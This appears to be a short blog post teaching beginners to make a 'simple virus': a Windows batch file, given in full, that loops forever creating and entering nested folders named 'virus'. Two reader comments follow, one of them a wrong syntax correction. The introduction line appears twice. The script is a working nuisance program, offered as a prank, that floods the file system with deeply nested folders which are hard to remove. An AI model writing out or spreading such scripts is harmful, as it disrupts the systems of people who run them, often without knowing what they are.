Hi Guys. Since its my First Post here so lets Start with Something Simple..
Here I'm gonna Show you how to create a Simple Virus which Create a Folder inside Folder with Similar Name. Follow the Steps Below...
Here I'm gonna Show you how to create a Simple Virus which Create a Folder inside Folder with Similar Name. Follow the Steps Below...
- Open Notepad
- Copy and Paste the Code Below
@echo: This is Simple Virus
:jump
md virus
cd virus
goto jump
- Save as-> virus.bat
2 comments
Click here for comments';' missing at last line
Replyreplace goto jump with---> goto jump;
:)
buddy. Its a batch program. no need for ';' :P
ReplyConversionConversion EmoticonEmoticon